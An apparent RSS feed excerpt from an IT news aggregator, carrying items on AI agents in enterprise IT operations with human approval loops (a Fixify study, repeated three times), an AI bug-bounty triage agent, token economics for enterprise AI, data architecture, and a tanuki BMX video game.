<pubDate>Tue, 04 Aug 2026 18:57:47 +0200</pubDate>
<content:encoded><![CDATA[LLMs made it cheap to flood bug bounty programs with submissions. Here's how Elastic built an AI triage agent that matches human decisions 85% of the time, including the architecture, threat model and calibration against 3,300 real reports]]></content:encoded>
</item>
<item>
<title><![CDATA[The Medallion Data Architecture: An Introduction]]></title>
<description><![CDATA[A practical guide to Bronze, Silver and Gold, with a working Python and DuckDB example
The post The Medallion Data Architecture: An Introduction appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3703867/ai-nachrichten/the-medallion-data-architecture-an-introduction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703867/ai-nachrichten/the-medallion-data-architecture-an-introduction/</guid>
<pubDate>Tue, 04 Aug 2026 18:42:49 +0200</pubDate>
<content:encoded><![CDATA[<p>A practical guide to Bronze, Silver and Gold, with a working Python and DuckDB example</p>
<p>The post <a href="https://towardsdatascience.com/the-medallion-data-architecture/">The Medallion Data Architecture: An Introduction</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents get better at IT ops, but only with humans in the loop]]></title>
<description><![CDATA[AI agents are performing roughly 1 in 3 actions in enterprise IT workflows (but that share is rising quickly), while human analysts are rejecting about one-quarter of AI-proposed actions (but that rate is falling), according to a new study of tens of thousands of human-AI interactions. Operationa...]]></description>
<link>https://tsecurity.de/de/3703728/it-nachrichten/ai-agents-get-better-at-it-ops-but-only-with-humans-in-the-loop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703728/it-nachrichten/ai-agents-get-better-at-it-ops-but-only-with-humans-in-the-loop/</guid>
<pubDate>Tue, 04 Aug 2026 17:49:15 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI agents are performing roughly 1 in 3 actions in enterprise IT workflows (but that share is rising quickly), while human analysts are rejecting about one-quarter of AI-proposed actions (but that rate is falling), according to a new study of tens of thousands of human-AI interactions. Operational data, rather than underlying AI infrastructures, is often the culprit when things go wrong.</p>



<p class="wp-block-paragraph">Human analysts are approving the most consequential actions, managing exceptions, and supervising and shaping agentic systems, while AI agents are carrying out routine tasks and executions, automation platform provider <a href="https://www.fixify.com/agentic-report" target="_blank" rel="noreferrer noopener">Fixify found in the study</a>.</p>



<p class="wp-block-paragraph">“That may sound less dramatic than replacing the help desk,” <a href="https://www.linkedin.com/in/matt-peters-5984b5/" target="_blank" rel="noreferrer noopener">Matt Peters</a>, Fixify’s co-founder and CEO, wrote in a <a href="https://www.fixify.com/blog/agentic-ai-it-lessons" target="_blank" rel="noreferrer noopener">blog post</a>. “It’s also a much more credible path to changing how IT work gets done.”</p>



<h2 class="wp-block-heading">Building scaffolding</h2>



<p class="wp-block-paragraph">Fixify identified four steps of agentic work: Planning, proposing, approving or declining, then acting on approved steps.</p>



<p class="wp-block-paragraph">It analyzed nearly 18,000 plans and over 147,000 actions executed by agents across 40 companies over a three-month period, finding that agents are taking over one-third of IT actions, most notably in software, applications, security, and collaboration work where requests tend to be “repeatable and easy to reverse.”</p>



<p class="wp-block-paragraph">Tasks that are well understood and that present low risk are best suited for the current generation of agents, Peters wrote. <a href="https://www.cio.com/article/4204021/ai-can-do-your-tasks-that-doesnt-mean-it-will-do-your-job.html" target="_blank">Human analysts</a> remain closely involved in higher-stakes areas like identity verification, setting up and removing IT access (onboarding and offboarding), and hardware environments.</p>



<p class="wp-block-paragraph">However, AI’s share of the work is increasing as feedback loops improve: Over the three-month period, human approval of AI-proposed actions rose from 23% to 41%, and rejection fell from 27% to 16%, Fixify found.</p>



<p class="wp-block-paragraph">The company identified six types of actions in AI automation. Running a skill — actually doing something — accounted for 39.4% of all actions). Most of the rest were coordination: sending a message to the human requester (27.7% of actions), leaving an initial comment (13.2%), giving instructions to a human analyst (9.8%), or waiting (8.8%). Running entire workflows accounted for just 1.1% of actions.</p>



<p class="wp-block-paragraph">AI is building “scaffolding” that wraps around meaningful changes, often planning far more scenarios than the agent will execute. Typically, agents map out 15 possible actions but run only two, Fixify said.</p>



<p class="wp-block-paragraph">“The agent maps the paths a request could take, then walks down the path that makes the most sense as it meets reality,” the study said.</p>



<p class="wp-block-paragraph">Peters pointed to one example where an AI agent identified which team needed access to process a high-volume type of ticket. Rather than fully automating the process, the agent did the initial triage, asked questions, then routed tickets to the team that had the information to act immediately.</p>



<p class="wp-block-paragraph">“We didn’t need a world-ending hive mind,” he said. “We just needed to point a little conversational intelligence in the right direction.”</p>



<h2 class="wp-block-heading">When AI breaks down</h2>



<p class="wp-block-paragraph">IT automation typically involves analyzing tickets and moving them along; in other words, low-risk tasks.</p>



<p class="wp-block-paragraph">But agents do participate in areas like <a href="https://www.csoonline.com/article/4204101/ai-is-making-cybersecurity-fundamentals-more-important-than-ever.html">security</a> (albeit only about 6%), most notably adding and removing people from groups or channels, unlocking accounts, resetting passwords, analyzing multi-factor authentication (MFA), provisioning (or deprovisioning) accounts, and assigning software licenses.</p>



<p class="wp-block-paragraph">However, this identity-lifecycle work is where agents failed the most, particularly in onboarding and offboarding and identity-access management (IAM), the study found. “Hardware and connectivity changes rarely fail; identity-lifecycle changes fail three-to-nine times as often.”</p>



<h2 class="wp-block-heading">Why AI breaks down</h2>



<p class="wp-block-paragraph">Thanks to human-in-the-loop controls, Fixify was able to analyze scenarios where agent recommendation diverged from human judgment. This occurred about 23% of the time.</p>



<p class="wp-block-paragraph">The largest failure category (nearly 50%) was ‘target not found,’ meaning the agent couldn’t uncover what it needed. This typically comes down to poor data: A user, group, account, or resource was not where the system expected it to be. When people change teams, groups are restructured, accounts are renamed, or work has already been done but not reflected in the system, this is more of an identity hygiene problem than an AI problem. The system needs cleaner and more current data.</p>



<p class="wp-block-paragraph">Invalid inputs accounted for around 29% of failures, followed by unhandled errors, denied permissions, or invalid operations or configurations. The latter signal “real breakage” in integrations, according to Fixify.</p>



<h2 class="wp-block-heading">AI becomes more sophisticated over time</h2>



<p class="wp-block-paragraph">The good news is that AI automation improves over time, even if it might take a while. In <a href="https://www.cio.com/article/4202404/forward-deployed-engineering-in-the-age-of-agentic-ai-from-vibe-coding-to-governed-autonomy.html">hybrid systems</a>, humans keep the most consequential changes under their own control, and iterative rejection and approval helps AI learn.</p>



<p class="wp-block-paragraph">Over time, agents’ plans get leaner and they start to re-plan when conditions change, rather than pre-planning all kinds of scenarios that may never occur. “That’s a sign of sophistication,” the study said. “Adapting in the moment is a more advanced behavior than trying to pre-script every contingency.”</p>



<p class="wp-block-paragraph">In turn, humans second guess the system less often and feel comfortable handing off more work. Instead, they control how agents behave, make high-impact decisions, and handle exceptions. “The hardest requests remain human-heavy, especially those that require repeated replanning or contextual judgment,” the study said.</p>



<h2 class="wp-block-heading">How teams can adapt to AI agents</h2>



<p class="wp-block-paragraph">As agentic AI becomes embedded in more workflows — and at deeper levels — enterprises must evolve to accommodate, Fixify emphasized.</p>



<p class="wp-block-paragraph">This means investing in clean identity data and building strong playbooks, review workflows, and reliable integrations.</p>



<p class="wp-block-paragraph">Teams should judge agentic tools by their supervision loop and view rejections as a training process, Fixify advised. Analyst time, queues, and metrics should be built around reviewing proposals. Agent replanning can be seen as a routing signal: A single replan might indicate healthy adaptation, while repeated replanning means ambiguity, irrelevance, or unclear policies.</p>



<p class="wp-block-paragraph">“Make the review surface easy to understand so analysts can assess proposed actions and make quick decisions about how to proceed,” the study advised. “This is where the analyst’s attention belongs.”</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.computerworld.com/article/4205062/ai-agents-get-better-at-it-ops-but-only-with-humans-in-the-loop.html">Computerworld</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents get better at IT ops, but only with humans in the loop]]></title>
<description><![CDATA[AI agents are performing roughly 1 in 3 actions in enterprise IT workflows (but that share is rising quickly), while human analysts are rejecting about one-quarter of AI-proposed actions (but that rate is falling), according to a new study of tens of thousands of human-AI interactions. Operationa...]]></description>
<link>https://tsecurity.de/de/3703704/ai-nachrichten/ai-agents-get-better-at-it-ops-but-only-with-humans-in-the-loop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703704/ai-nachrichten/ai-agents-get-better-at-it-ops-but-only-with-humans-in-the-loop/</guid>
<pubDate>Tue, 04 Aug 2026 17:43:04 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI agents are performing roughly 1 in 3 actions in enterprise IT workflows (but that share is rising quickly), while human analysts are rejecting about one-quarter of AI-proposed actions (but that rate is falling), according to a new study of tens of thousands of human-AI interactions. Operational data, rather than underlying AI infrastructures, is often the culprit when things go wrong.</p>



<p class="wp-block-paragraph">Human analysts are approving the most consequential actions, managing exceptions, and supervising and shaping agentic systems, while AI agents are carrying out routine tasks and executions, automation platform provider <a href="https://www.fixify.com/agentic-report" target="_blank" rel="noreferrer noopener">Fixify found in the study</a>.</p>



<p class="wp-block-paragraph">“That may sound less dramatic than replacing the help desk,” <a href="https://www.linkedin.com/in/matt-peters-5984b5/" target="_blank" rel="noreferrer noopener">Matt Peters</a>, Fixify’s co-founder and CEO, wrote in a <a href="https://www.fixify.com/blog/agentic-ai-it-lessons" target="_blank" rel="noreferrer noopener">blog post</a>. “It’s also a much more credible path to changing how IT work gets done.”</p>



<h2 class="wp-block-heading">Building scaffolding</h2>



<p class="wp-block-paragraph">Fixify identified four steps of agentic work: Planning, proposing, approving or declining, then acting on approved steps.</p>



<p class="wp-block-paragraph">It analyzed nearly 18,000 plans and over 147,000 actions executed by agents across 40 companies over a three-month period, finding that agents are taking over one-third of IT actions, most notably in software, applications, security, and collaboration work where requests tend to be “repeatable and easy to reverse.”</p>



<p class="wp-block-paragraph">Tasks that are well understood and that present low risk are best suited for the current generation of agents, Peters wrote. <a href="https://www.cio.com/article/4204021/ai-can-do-your-tasks-that-doesnt-mean-it-will-do-your-job.html" target="_blank">Human analysts</a> remain closely involved in higher-stakes areas like identity verification, setting up and removing IT access (onboarding and offboarding), and hardware environments.</p>



<p class="wp-block-paragraph">However, AI’s share of the work is increasing as feedback loops improve: Over the three-month period, human approval of AI-proposed actions rose from 23% to 41%, and rejection fell from 27% to 16%, Fixify found.</p>



<p class="wp-block-paragraph">The company identified six types of actions in AI automation. Running a skill — actually doing something — accounted for 39.4% of all actions). Most of the rest were coordination: sending a message to the human requester (27.7% of actions), leaving an initial comment (13.2%), giving instructions to a human analyst (9.8%), or waiting (8.8%). Running entire workflows accounted for just 1.1% of actions.</p>



<p class="wp-block-paragraph">AI is building “scaffolding” that wraps around meaningful changes, often planning far more scenarios than the agent will execute. Typically, agents map out 15 possible actions but run only two, Fixify said.</p>



<p class="wp-block-paragraph">“The agent maps the paths a request could take, then walks down the path that makes the most sense as it meets reality,” the study said.</p>



<p class="wp-block-paragraph">Peters pointed to one example where an AI agent identified which team needed access to process a high-volume type of ticket. Rather than fully automating the process, the agent did the initial triage, asked questions, then routed tickets to the team that had the information to act immediately.</p>



<p class="wp-block-paragraph">“We didn’t need a world-ending hive mind,” he said. “We just needed to point a little conversational intelligence in the right direction.”</p>



<h2 class="wp-block-heading">When AI breaks down</h2>



<p class="wp-block-paragraph">IT automation typically involves analyzing tickets and moving them along; in other words, low-risk tasks.</p>



<p class="wp-block-paragraph">But agents do participate in areas like <a href="https://www.csoonline.com/article/4204101/ai-is-making-cybersecurity-fundamentals-more-important-than-ever.html">security</a> (albeit only about 6%), most notably adding and removing people from groups or channels, unlocking accounts, resetting passwords, analyzing multi-factor authentication (MFA), provisioning (or deprovisioning) accounts, and assigning software licenses.</p>



<p class="wp-block-paragraph">However, this identity-lifecycle work is where agents failed the most, particularly in onboarding and offboarding and identity-access management (IAM), the study found. “Hardware and connectivity changes rarely fail; identity-lifecycle changes fail three-to-nine times as often.”</p>



<h2 class="wp-block-heading">Why AI breaks down</h2>



<p class="wp-block-paragraph">Thanks to human-in-the-loop controls, Fixify was able to analyze scenarios where agent recommendation diverged from human judgment. This occurred about 23% of the time.</p>



<p class="wp-block-paragraph">The largest failure category (nearly 50%) was ‘target not found,’ meaning the agent couldn’t uncover what it needed. This typically comes down to poor data: A user, group, account, or resource was not where the system expected it to be. When people change teams, groups are restructured, accounts are renamed, or work has already been done but not reflected in the system, this is more of an identity hygiene problem than an AI problem. The system needs cleaner and more current data.</p>



<p class="wp-block-paragraph">Invalid inputs accounted for around 29% of failures, followed by unhandled errors, denied permissions, or invalid operations or configurations. The latter signal “real breakage” in integrations, according to Fixify.</p>



<h2 class="wp-block-heading">AI becomes more sophisticated over time</h2>



<p class="wp-block-paragraph">The good news is that AI automation improves over time, even if it might take a while. In <a href="https://www.cio.com/article/4202404/forward-deployed-engineering-in-the-age-of-agentic-ai-from-vibe-coding-to-governed-autonomy.html">hybrid systems</a>, humans keep the most consequential changes under their own control, and iterative rejection and approval helps AI learn.</p>



<p class="wp-block-paragraph">Over time, agents’ plans get leaner and they start to re-plan when conditions change, rather than pre-planning all kinds of scenarios that may never occur. “That’s a sign of sophistication,” the study said. “Adapting in the moment is a more advanced behavior than trying to pre-script every contingency.”</p>



<p class="wp-block-paragraph">In turn, humans second guess the system less often and feel comfortable handing off more work. Instead, they control how agents behave, make high-impact decisions, and handle exceptions. “The hardest requests remain human-heavy, especially those that require repeated replanning or contextual judgment,” the study said.</p>



<h2 class="wp-block-heading">How teams can adapt to AI agents</h2>



<p class="wp-block-paragraph">As agentic AI becomes embedded in more workflows — and at deeper levels — enterprises must evolve to accommodate, Fixify emphasized.</p>



<p class="wp-block-paragraph">This means investing in clean identity data and building strong playbooks, review workflows, and reliable integrations.</p>



<p class="wp-block-paragraph">Teams should judge agentic tools by their supervision loop and view rejections as a training process, Fixify advised. Analyst time, queues, and metrics should be built around reviewing proposals. Agent replanning can be seen as a routing signal: A single replan might indicate healthy adaptation, while repeated replanning means ambiguity, irrelevance, or unclear policies.</p>



<p class="wp-block-paragraph">“Make the review surface easy to understand so analysts can assess proposed actions and make quick decisions about how to proceed,” the study advised. “This is where the analyst’s attention belongs.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Der8auer Built a CPU Cooler Chimney to Prove Vertical Cooling Makes Sense]]></title>
<description><![CDATA[But only really if you have a huge case and lots of space.]]></description>
<link>https://tsecurity.de/de/3703653/it-nachrichten/der8auer-built-a-cpu-cooler-chimney-to-prove-vertical-cooling-makes-sense/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703653/it-nachrichten/der8auer-built-a-cpu-cooler-chimney-to-prove-vertical-cooling-makes-sense/</guid>
<pubDate>Tue, 04 Aug 2026 17:31:09 +0200</pubDate>
<content:encoded><![CDATA[But only really if you have a huge case and lots of space.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mallory Unifies Threat Intelligence, Exposure Context, and Response Into One Architecture for Security Teams]]></title>
<description><![CDATA[Las Vegas, United States, 4th August 2026, CyberNewswire]]></description>
<link>https://tsecurity.de/de/3703639/it-security-nachrichten/mallory-unifies-threat-intelligence-exposure-context-and-response-into-one-architecture-for-security-teams/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703639/it-security-nachrichten/mallory-unifies-threat-intelligence-exposure-context-and-response-into-one-architecture-for-security-teams/</guid>
<pubDate>Tue, 04 Aug 2026 17:17:02 +0200</pubDate>
<content:encoded><![CDATA[Las Vegas, United States, 4th August 2026, CyberNewswire]]></content:encoded>
</item>
<item>
<title><![CDATA[‘He’s tiny, dumpy and funny – so his BMX tricks are hilarious’: Tanuki: Pon’s Summer, an adorable slice-of-life adventure]]></title>
<description><![CDATA[Denkiworks’ debut lets players pull off tricks and pull pints in a stunning, Japan-inspired settingA freeloading tanuki, mounting debt, and a town full of possibilities will sound familiar to fans of Animal Crossing. Alas, while you won’t find accountability from Tom Nook, Kyoto-based studio Denk...]]></description>
<link>https://tsecurity.de/de/3703620/it-nachrichten/hes-tiny-dumpy-and-funny-so-his-bmx-tricks-are-hilarious-tanuki-pons-summer-an-adorable-slice-of-life-adventure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703620/it-nachrichten/hes-tiny-dumpy-and-funny-so-his-bmx-tricks-are-hilarious-tanuki-pons-summer-an-adorable-slice-of-life-adventure/</guid>
<pubDate>Tue, 04 Aug 2026 17:12:32 +0200</pubDate>
<content:encoded><![CDATA[<p>Denkiworks’ debut lets players pull off tricks and pull pints in a stunning, Japan-inspired setting</p><p>A freeloading tanuki, mounting debt, and a town full of possibilities will sound familiar to fans of <a href="https://www.theguardian.com/games/2026/jan/20/animal-crossings-new-update-has-revived-my-pandemic-sanctuary">Animal Crossing</a>. Alas, while you won’t find accountability from Tom Nook, Kyoto-based studio Denkiworks has stepped in to heal your financial trauma with a BMX-filled adventure in which a mammal finally pays the price for their years of bad behaviour. “Even Japanese people ask why it’s a tanuki,” jokes Liam Edwards, a game designer at Denkiworks. “They have such a mythological background to them; they’re almost like dragons in terms of their mythology.”</p><p>In Tanuki: Pon’s Summer, you play as an adorable but irresponsible critter named Pon, who’s bled the coffers of the local shrine – his home – dry by buying video games and snack food instead of preparing for its semicentennial matsuri. As a result, the shrine is in total disrepair, and important architecture and cultural artefacts – such as the ema stand and the chōzuya – are left cracked and broken, unbefitting a festival half a century in the making.</p> <a href="https://www.theguardian.com/games/2026/aug/04/tanuki-pons-summer-bmx-adventure-japan">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents get better at IT ops, but only with humans in the loop]]></title>
<description><![CDATA[AI agents are performing roughly 1 in 3 actions in enterprise IT workflows (but that share is rising quickly), while human analysts are rejecting about one-quarter of AI-proposed actions (but that rate is falling), according to a new study of tens of thousands of human-AI interactions. Operationa...]]></description>
<link>https://tsecurity.de/de/3703568/it-security-nachrichten/ai-agents-get-better-at-it-ops-but-only-with-humans-in-the-loop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703568/it-security-nachrichten/ai-agents-get-better-at-it-ops-but-only-with-humans-in-the-loop/</guid>
<pubDate>Tue, 04 Aug 2026 16:55:00 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI agents are performing roughly 1 in 3 actions in enterprise IT workflows (but that share is rising quickly), while human analysts are rejecting about one-quarter of AI-proposed actions (but that rate is falling), according to a new study of tens of thousands of human-AI interactions. Operational data, rather than underlying AI infrastructures, is often the culprit when things go wrong.</p>



<p class="wp-block-paragraph">Human analysts are approving the most consequential actions, managing exceptions, and supervising and shaping agentic systems, while AI agents are carrying out routine tasks and executions, automation platform provider <a href="https://www.fixify.com/agentic-report" target="_blank" rel="noreferrer noopener">Fixify found in the study</a>.</p>



<p class="wp-block-paragraph">“That may sound less dramatic than replacing the help desk,” <a href="https://www.linkedin.com/in/matt-peters-5984b5/" target="_blank" rel="noreferrer noopener">Matt Peters</a>, Fixify’s co-founder and CEO, wrote in a <a href="https://www.fixify.com/blog/agentic-ai-it-lessons" target="_blank" rel="noreferrer noopener">blog post</a>. “It’s also a much more credible path to changing how IT work gets done.”</p>



<h2 class="wp-block-heading">Building scaffolding</h2>



<p class="wp-block-paragraph">Fixify identified four steps of agentic work: Planning, proposing, approving or declining, then acting on approved steps.</p>



<p class="wp-block-paragraph">It analyzed nearly 18,000 plans and over 147,000 actions executed by agents across 40 companies over a three-month period, finding that agents are taking over one-third of IT actions, most notably in software, applications, security, and collaboration work where requests tend to be “repeatable and easy to reverse.”</p>



<p class="wp-block-paragraph">Tasks that are well understood and that present low risk are best suited for the current generation of agents, Peters wrote. <a href="https://www.cio.com/article/4204021/ai-can-do-your-tasks-that-doesnt-mean-it-will-do-your-job.html" target="_blank">Human analysts</a> remain closely involved in higher-stakes areas like identity verification, setting up and removing IT access (onboarding and offboarding), and hardware environments.</p>



<p class="wp-block-paragraph">However, AI’s share of the work is increasing as feedback loops improve: Over the three-month period, human approval of AI-proposed actions rose from 23% to 41%, and rejection fell from 27% to 16%, Fixify found.</p>



<p class="wp-block-paragraph">The company identified six types of actions in AI automation. Running a skill — actually doing something — accounted for 39.4% of all actions). Most of the rest were coordination: sending a message to the human requester (27.7% of actions), leaving an initial comment (13.2%), giving instructions to a human analyst (9.8%), or waiting (8.8%). Running entire workflows accounted for just 1.1% of actions.</p>



<p class="wp-block-paragraph">AI is building “scaffolding” that wraps around meaningful changes, often planning far more scenarios than the agent will execute. Typically, agents map out 15 possible actions but run only two, Fixify said.</p>



<p class="wp-block-paragraph">“The agent maps the paths a request could take, then walks down the path that makes the most sense as it meets reality,” the study said.</p>



<p class="wp-block-paragraph">Peters pointed to one example where an AI agent identified which team needed access to process a high-volume type of ticket. Rather than fully automating the process, the agent did the initial triage, asked questions, then routed tickets to the team that had the information to act immediately.</p>



<p class="wp-block-paragraph">“We didn’t need a world-ending hive mind,” he said. “We just needed to point a little conversational intelligence in the right direction.”</p>



<h2 class="wp-block-heading">When AI breaks down</h2>



<p class="wp-block-paragraph">IT automation typically involves analyzing tickets and moving them along; in other words, low-risk tasks.</p>



<p class="wp-block-paragraph">But agents do participate in areas like <a href="https://www.csoonline.com/article/4204101/ai-is-making-cybersecurity-fundamentals-more-important-than-ever.html">security</a> (albeit only about 6%), most notably adding and removing people from groups or channels, unlocking accounts, resetting passwords, analyzing multi-factor authentication (MFA), provisioning (or deprovisioning) accounts, and assigning software licenses.</p>



<p class="wp-block-paragraph">However, this identity-lifecycle work is where agents failed the most, particularly in onboarding and offboarding and identity-access management (IAM), the study found. “Hardware and connectivity changes rarely fail; identity-lifecycle changes fail three-to-nine times as often.”</p>



<h2 class="wp-block-heading">Why AI breaks down</h2>



<p class="wp-block-paragraph">Thanks to human-in-the-loop controls, Fixify was able to analyze scenarios where agent recommendation diverged from human judgment. This occurred about 23% of the time.</p>



<p class="wp-block-paragraph">The largest failure category (nearly 50%) was ‘target not found,’ meaning the agent couldn’t uncover what it needed. This typically comes down to poor data: A user, group, account, or resource was not where the system expected it to be. When people change teams, groups are restructured, accounts are renamed, or work has already been done but not reflected in the system, this is more of an identity hygiene problem than an AI problem. The system needs cleaner and more current data.</p>



<p class="wp-block-paragraph">Invalid inputs accounted for around 29% of failures, followed by unhandled errors, denied permissions, or invalid operations or configurations. The latter signal “real breakage” in integrations, according to Fixify.</p>



<h2 class="wp-block-heading">AI becomes more sophisticated over time</h2>



<p class="wp-block-paragraph">The good news is that AI automation improves over time, even if it might take a while. In <a href="https://www.cio.com/article/4202404/forward-deployed-engineering-in-the-age-of-agentic-ai-from-vibe-coding-to-governed-autonomy.html">hybrid systems</a>, humans keep the most consequential changes under their own control, and iterative rejection and approval helps AI learn.</p>



<p class="wp-block-paragraph">Over time, agents’ plans get leaner and they start to re-plan when conditions change, rather than pre-planning all kinds of scenarios that may never occur. “That’s a sign of sophistication,” the study said. “Adapting in the moment is a more advanced behavior than trying to pre-script every contingency.”</p>



<p class="wp-block-paragraph">In turn, humans second guess the system less often and feel comfortable handing off more work. Instead, they control how agents behave, make high-impact decisions, and handle exceptions. “The hardest requests remain human-heavy, especially those that require repeated replanning or contextual judgment,” the study said.</p>



<h2 class="wp-block-heading">How teams can adapt to AI agents</h2>



<p class="wp-block-paragraph">As agentic AI becomes embedded in more workflows — and at deeper levels — enterprises must evolve to accommodate, Fixify emphasized.</p>



<p class="wp-block-paragraph">This means investing in clean identity data and building strong playbooks, review workflows, and reliable integrations.</p>



<p class="wp-block-paragraph">Teams should judge agentic tools by their supervision loop and view rejections as a training process, Fixify advised. Analyst time, queues, and metrics should be built around reviewing proposals. Agent replanning can be seen as a routing signal: A single replan might indicate healthy adaptation, while repeated replanning means ambiguity, irrelevance, or unclear policies.</p>



<p class="wp-block-paragraph">“Make the review surface easy to understand so analysts can assess proposed actions and make quick decisions about how to proceed,” the study advised. “This is where the analyst’s attention belongs.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Redefining Network Security for the Frontier AI Era]]></title>
<description><![CDATA[Modern enterprise security is at a pivotal moment where CIOs and CISOs have a clear opportunity to build a cybersecurity architecture for both today’s…
Read more →
The post Redefining Network Security for the Frontier AI Era appeared first on IT Security News.]]></description>
<link>https://tsecurity.de/de/3703366/it-security-nachrichten/redefining-network-security-for-the-frontier-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703366/it-security-nachrichten/redefining-network-security-for-the-frontier-ai-era/</guid>
<pubDate>Tue, 04 Aug 2026 15:36:12 +0200</pubDate>
<content:encoded><![CDATA[<p>Modern enterprise security is at a pivotal moment where CIOs and CISOs have a clear opportunity to build a cybersecurity architecture for both today’s…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/redefining-network-security-for-the-frontier-ai-era/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/redefining-network-security-for-the-frontier-ai-era/">Redefining Network Security for the Frontier AI Era</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why meta agents must become the economic intelligence layer of the agentic enterprise]]></title>
<description><![CDATA[In “Micro and macro agents: The emerging architecture of the agentic enterprise,” I proposed a three-layer architecture for enterprise AI.




Micro agents execute specialized tasks.



Macro agents orchestrate end-to-end business processes.



Meta agents provide governance through monitoring, c...]]></description>
<link>https://tsecurity.de/de/3703201/it-security-nachrichten/why-meta-agents-must-become-the-economic-intelligence-layer-of-the-agentic-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703201/it-security-nachrichten/why-meta-agents-must-become-the-economic-intelligence-layer-of-the-agentic-enterprise/</guid>
<pubDate>Tue, 04 Aug 2026 14:27:12 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In “<a href="https://www.cio.com/article/4157977/micro-and-macro-agents-the-emerging-architecture-of-the-agentic-enterprise.html?utm=hybrid_search">Micro and macro agents: The emerging architecture of the agentic enterprise</a>,” I proposed a three-layer architecture for enterprise AI.</p>



<ol class="wp-block-list">
<li><strong>Micro agents</strong> execute specialized tasks.</li>



<li><strong>Macro agents</strong> orchestrate end-to-end business processes.</li>



<li><strong>Meta agents</strong> provide governance through monitoring, compliance, security, and human oversight.</li>
</ol>



<p class="wp-block-paragraph">As enterprises begin deploying thousands — and eventually tens of thousands — of autonomous agents, token costs have become a major concern. According to <a href="https://www.gartner.com/en/newsroom/press-releases/2026-06-24-gartner-predicts-ai-coding-costs-will-surpass-average-developer-salary-by-2028-as-token-consumption-surges">Gartner</a>, rising token-driven AI spend is straining budgets and challenging cost justification.</p>



<p class="wp-block-paragraph">To track this economic concern, meta agents should do more than simply being the governance agents.</p>



<p class="wp-block-paragraph">They should become the economic intelligence layer of the enterprise.</p>



<p class="wp-block-paragraph">Their responsibility is not only ensuring AI behaves responsibly.</p>



<p class="wp-block-paragraph">It is ensuring AI creates measurable business value.</p>



<h2 class="wp-block-heading">The missing economic model for AI</h2>



<p class="wp-block-paragraph">Every major technology revolution eventually develops its own economic framework:</p>



<ul class="wp-block-list">
<li>Manufacturing measured productivity.</li>



<li>Cloud computing measured infrastructure utilization.</li>



<li>Digital businesses measured customer acquisition costs and lifetime value.</li>
</ul>



<p class="wp-block-paragraph">The agentic enterprise now requires its own financial discipline. Every AI prompt. Every reasoning cycle. Every interaction between agents. Every autonomous workflow.</p>



<p class="wp-block-paragraph">Tokens have quietly become the <a href="https://www.networkworld.com/article/4153278/tokenomics-why-it-leaders-need-to-pay-attention-to-ai-tokens.html?utm_source=miso&amp;utm_medium=related&amp;utm_campaign=thumbnail_list">operational currency</a> of enterprise AI. <a href="https://www.cio.com/article/4184596/tokenomics-in-enterprise-ai.html?utm=hybrid_search">Tokenomics is now a foundational part of enterprise AI architecture.</a></p>



<p class="wp-block-paragraph">Yet today, most organizations measure only one thing: Cost. How many tokens were consumed? Which models cost the most? What was the monthly inference bill?</p>



<p class="wp-block-paragraph">These are useful operational metrics.</p>



<p class="wp-block-paragraph">They are not strategic business metrics. Boards rarely ask how much electricity a factory consumed. They ask how much value the factory produced.</p>



<p class="wp-block-paragraph">Enterprise AI deserves the same conversation.</p>



<p class="wp-block-paragraph">This is where I was thinking about the laws of physics.  Based on physics laws,  energy cannot be created or destroyed. It is transformed into another form. Electricity becomes light. Chemical energy becomes motion. Solar energy becomes electricity.</p>



<p class="wp-block-paragraph">Enterprise AI offers a similar management lesson.</p>



<h2 class="wp-block-heading">Intelligence must be transformed into value</h2>



<p class="wp-block-paragraph">Tokens are not valuable because they are consumed. They become valuable only when they are transformed into business outcomes. A faster loan application decision. A fraud detection. A better customer experience. Higher software quality. Greater employee productivity. A new business opportunity.</p>



<p class="wp-block-paragraph">This leads to what I call return on tokens (ROT).</p>



<p class="wp-block-paragraph">ROT measures how effectively an organization converts token consumption into measurable business value.</p>



<p class="wp-block-paragraph">Instead of asking, “How many tokens did we consume,” leaders should ask, “How much enterprise value did every million tokens create?”</p>



